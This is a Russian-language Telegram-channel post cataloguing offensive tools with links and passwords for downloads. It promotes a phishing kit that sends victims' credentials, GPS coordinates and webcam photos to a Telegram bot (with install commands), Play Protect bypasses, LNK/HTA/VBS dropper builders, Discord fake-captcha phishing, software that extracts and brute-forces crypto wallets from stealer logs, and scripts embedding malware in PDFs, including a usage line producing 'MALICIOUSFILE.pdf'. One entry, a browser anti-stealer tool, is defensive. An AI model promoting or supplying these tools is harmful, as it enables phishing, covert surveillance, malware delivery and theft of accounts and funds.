July 3

Библиотека разных софтов и скриптов v1.1

Взято из открытых источников
Вся представленная информация несёт лишь ознакомительный характер и не призывает вас к действиям нарушающих закон!

❗️НЕ ИГНОРИРУЙТЕ ЭТО СООБЩЕНИЕ❗️

единственный мой актуальный контакт находится в канале "обучение" или можно связаться со мной в общем чате "ссылки ниже" , других способов связаться со мной нет и я никогда не пишу первый в лс, если вам кто то выдает мануал от лица моего проекта или представляется тс или админом моего проекта это мошенник , ни при каких условиях не переводите деньги и не покупайте у него ничего , материал я не продаю и уж тем более не торгую мануалами , я их все выкладываю в общий доступ для всех

Основной чат https://t.me/+wu6HaZAs8lkzNzM6
Основной канал https://t.me/+zVmNi-KGFtYyZTgy
Обучение https://t.me/+O-KVFmBigsk0ZjYy

Сейчас телеграмм активно блокирует подобного рода каналы и имея уже неоднократный опыт было принято решение создать резерв . Оставьте сразу заявку чтоб не потерять нас

https://t.me/+xkl9r-o9nQAwMDdi чат
https://t.me/+yN4ueJTkCApmOTc6 канал

MangoKeyword [3.4.1]

Mango Keywords - это удобный инструмент для поиска нужных слов, который включает в себя средства проверки валидности, парсеры, утилиты и средства создания ключевых слов.

Особенности:

  • Парсер. Позволяет анализировать страницы Google, Bing, Ask, Yandex, Start Page, Yahoo, Yahoo Japan, AOL, Naver, Baidu, Excite, Ecosia и DuckDuckGo. Есть настраиваемые параметры фильтрации, поддержка HTTP/s и SOCKS5 прокси и без них.
  • Генератор ключевых слов. В программе есть функция Keyword Diareah — быстрый скрепер для предсказания поиска, а также генераторы случайных слов, синонимов и прилагательных.
  • Утилиты. К ним относятся экстрактор параметров, экстрактор ключевых слов, экстрактор AIO, очиститель параметров, очиститель ключевых слов, фильтр URL, удалитель Unicode.
  • Проверка конфиденциальности URL. Позволяет проверить, являются ли URL-адреса открытыми.
  • Конфигурация автоматизации. Например, можно настроить смену VPN-сервера каждые 5 минут.
  • Бинарные файлы для Linux и Windows.
  • Удобный текстовый и графический интерфейс

https://github.com/mrshenmochi/-Mango-Keyword-

Trixter

Trixter - очень простой, но мощный инструмент для создания фишинга. Имеет небольшое количество вариантов фишинга, но довольно оптимальные и на все случаи жизни.

Trixter имеет 3 варианта фишинга. Для получения изображения с камеры, получения данных с GPS и такие данные как логин, пароль и код из смс или почты. Все данные отправляются в телеграмм бот, который настраивается при установке инструмента.

Варианты:

  • Email. Вариант с почтой, позволяет создать страницу простой регистрации, где необходимо указать почту, придумать пароль и повторить его. Однако есть некоторые условия. Строка почты, должна соответствовать условиям формата почты. Так же и строками для пароля. То есть, пароли не должно быть простыми, как например 12345678, qwerty и так далее, имеет ограничения в длине(минимум 8 символов). Поставленные условия могут показаться сложными для фишинга, но это играеть только в пользу автора фишинга.
  • Phone. С телефоном, абсолютно всё так же. Учётом того, что номера телефонов используют чаще для авторизации в более серьезных платформах (например телеграмм, вк и т.п), имеет простое и всем привычное использование, этот вариант вполне может повысить шансы. После первого этапа регистрации, пользователь ожидает код из смс.
  • Люди рядом[telegram]. Телега отключила эту функцию, да и пусть, нам это наруку. Этот вариант позволяет создать страницу, где предлагают найти пользователей в указанном месте или по юзернейму. При попытке поиска, страница отправляет точные координаты пользователя, атакующему, через телеграмм бот.
  • Взлом WiFi. Мечтать не вредно, хоть и существует такая возможность. Однако очередной рядовой не против полакомиться халявным интернетом соседа, особенно когда гигабайты уже на мели или просто хочет проверить что нибудь интересное.
  • Взломать домофон. Автор умолчал об этой части.
  • Captcha. Лайтовая капча, где необходимо подтвердить, что ты не робот. Но с сюрпризом. При подтверждении, что ты пользователь не робот, атакующий получается координаты.
  • Майнинг. Какие только способы не предлагает на этот мир, чтобы мы майнили используя чей то продукт. Как например тапалка хомяка. Но тут уже чуть иначе. Когда пользователь начнет майнить несуществующие коины, атакующий получит его координаты.
  • Captcha. Type camera. Этот вариант абсолютно соответствует предыдущему варианту с каптчой. Но вместо координат, атакующий получает фотографию с веб-камеры пользователя.
  • Мамкин пробиватор Х3000. Поиск по биометрии? Интересная вещь. Направляешь камеру и жмешь найти. Система предлагает поиса не только по социальным сетям, но и по различным системам, например мвд или какой нибудь секретной службы США. А ты только представь, человек так старательно наводит камеру на объект, жмет "поиск" в ожидании, что щас начнётся поиск информации по биометрии таргета. А тут включается веб-камера и фоткает его хмурое и старательное "не палиться" лицо. Естественно атакующий полкчает эту фотку в телеграмм.

Установка:

pkg update 

pkg upgrade 

pkg install nodejs git

git clone https://github.com/termuxtreem/trixter

cd trixter

node index.js

https://github.com/termuxtreem/trixter

Play Protect

Утилита с большим количеством настроек для подписи .apk приложений и обходом Google Play защиты.

Особенности:

  • Sign .APK
  • Convert more options
  • Changing memory file
  • Extract apk tool

https://github.com/Cyber-Root0/BypassPlayProtect

НО КАК ПО МНЕ ЭТО УДОБНЕЕ ДЕЛАТЬ ЧЕРЕЗ БОТ

ПОДРОБНОСТИ ТУТ https://github.com/Bypass-Google-Play-Protect/Bypass-Google-Play-Protect?tab=readme-ov-file

TGConverter

Софт представляет из себя простой конвертер аккаунтов Telegram.

Особенности:

  • tdata to .session
  • .session to tdata
  • [mass] tdata to .session

СКАЧАТЬ

https://wdfiles.ru/O8j8

ПАРОЛЬ
https://t.me/+XJPVxxlZSYAyYmRi

KnightLNK builder [+Source]

Это простой инструмент, написанный на C# для создания файлов-ссылок на удалённые файлы с последующей установкой и скрытым запуском.

Особенности:

  • Lnk-Dropper
  • HTA-Dropper
  • CMD-Dropper
  • BAT-Dropper
  • VBS-Dropper

https://github.com/offsoc/KnightLNK_builder/blob/main/screen1.png

DorkBuster

Приложение для генерации дорков с красивым визуальным интерфейсом и поддержкой Google и Github.

Для работы необходимо .net

Особенности:

  • Clean GUI/Easy Navigation
  • Built-In Error Logging
  • Blazing Fast
  • Targeted Dork Generation

https://github.com/kap0nedotexe/DorkBuster

XWallet

Приватный софт для работы с криптокошельками, который продавался от 500$ и имеет в себе внушительный функционал для обработки криптокошельков.

Особенности:

Режим работы:

  • Режим лога - в данном режиме софт достает кошельки и пароли из лога. Поддерживается как один лог, так и папка с множеством логов.
  • Режим брута - точечный подбор пароля к одному кошельку.
  • Режим дампа базы данных браузера. Такой дамп позволяет быстро обнаружить кошельки в которых используются аппаратники, достать адреса или другую информацию о кошельку.

Функционал:

  • Поддержка более 50 кошельков.
  • Софт работает даже с последней версией OKX которая привязывается к железу пользователя.
  • Работа с браузерами Chromium, Firefox, Safari — полный набор.
  • Максимальная скорость благодаря нативному коду.
  • Полная интеграция с Hashcat.
  • Так же можно использовать Hashcat Rules для генерации новых паролей, на основе паролей найденных в логе, что значительно увеличит шанс успешного подбора пароля.
  • Сбор сид-фраз из файлов, включая поиск по изображениям с помощью обученной OCR-модели.
  • Поддержка большого количество языков.​

СКАЧАТЬ
https://wdfiles.ru/O79d

ПАРОЛЬ
https://t.me/+XJPVxxlZSYAyYmRi

NoMoreCookies

Browser Protector против различных краж, написанный на C# и C/C++. Работает путем перехвата NtCreateFile и NtOpenFile и предотвращения доступа к файлам браузера, а также предотвращения некоторых типов соединения. Совместим с различными играми и программным обеспечением.

Протестированы на таких Stealers/RATs:

  • AsyncRAT
  • Quasar RAT
  • StormKitty
  • HackBrowserData
  • FireFox-Thief
  • DcRat
  • Umbral Stealer
  • Blank Grabber
  • Venom RAT
  • XWorm RAT
  • Raccoon Stealer
  • EdgeGuard
  • Vidar
  • RedLine

Софт должен работать против других популярных стиллеров. Обратите внимание, что эта защита работает не только с перечисленными выше вирусным ПО, также он будет работать и с будущими стилеррами. Данный метод защиты универсален.

Поддерживаемые браузеры:

  • Firefox
  • Brave
  • Chrome
  • Microsoft Edge
  • Yandex
  • Opera
  • Waterfox
  • Vivaldi

https://github.com/AdvDebug/NoMoreCookies?tab=readme-ov-file

Discord Captcha Fishing

Автоматизация фейковой капчи через дискорд-авторизацию. Скрипт написан на JavaScript.

https://github.com/45hr/Discord-Captcha-Fishing

Last Level Security

Инструмент предназначен для шифрования данных (папки / файлы). Разработчик мотивировался работой инструмента VeraCrypt.

Алгоритмы шифрования:

  • Блочное шифрование
  • Инициализационный вектор (IV)
  • Сложение блоков: первый блок данных перед шифрованием объединяется с инициализационным вектором, а каждый последующий блок данных объединяется с предыдущим зашифрованным блоком, это значит, что изменение любого блока данных повлияет на все последующие зашифрованные блоки
  • Использование энтропии для генерации ключа делает его менее предсказуемым
  • Каждый раз, когда вы шифруете данные, создание нового инициализационного вектора с помощью рандомных данных помогает избежать брутфорса
  • Режим CBC обеспечивает дополнительный уровень безопасности, добавляя случайность к процессу шифрования
  • Hash-based Message Authentication Code - позволяет проверить, были ли данные изменены или повреждены в процессе передачи. только обладатель этого ключа может создать верное значение HMAC. Это гарантирует, что данные действительно исходят от ожидаемого источника. Если он не совпадет при проверке это означает, что данные были скомпрометированы. Если взломщик не знает секретный ключ, он не может сгенерировать корректный HMAC для измененного сообщения (допустим как в атаках "man-in-the-middle attacks" и "replay attacks"). Использования устойчивой хэш функции обеспечивает доп. уровень безопасности.

https://github.com/reyzovw/LastLevelSecurity

PDF Auto Downloader

Эта программа создает pdf-документ с вашей ссылкой на загрузку. После того, как пользователь откроет pdf-документ, файл будет загружен автоматически, без дополнительных нажатий.

Особенности:

  • Возможность встроить любое изображение
  • Простота в использовании
  • Поддержка ссылок любого типа

Hermetic PDF Exploit

Довольно простой софт, который позволяет внедрять через нее свой троянский код. Исходя из названия все выливается в формат .PDF.

особенности:

  • Простота в использовании
  • Вывод собственного любого изображения на странице .PDF
  • Комбинирование с ссылкой любого вида

File-PDF2EXE

Скрипт на Python, который встраивает исполняемый файл в PDF-файл с помощью JavaScript. Скрипт использует библиотеки PyPDF2 и Pillow для работы с PDF-файлами и изображениями, а использование аргументов командной строки обрабатывается с помощью библиотеки argparse.

Установка компонентов:

pip install python-docx

pip install Pillow

pip install PyPDF2

Использование:

python file.py /home/Desktop/malware.exe /home/Desktop/README.pdf -o /home/Desktop/MALICIOUSFILE.pdf

https://t.me/+XJPVxxlZSYAyYmRi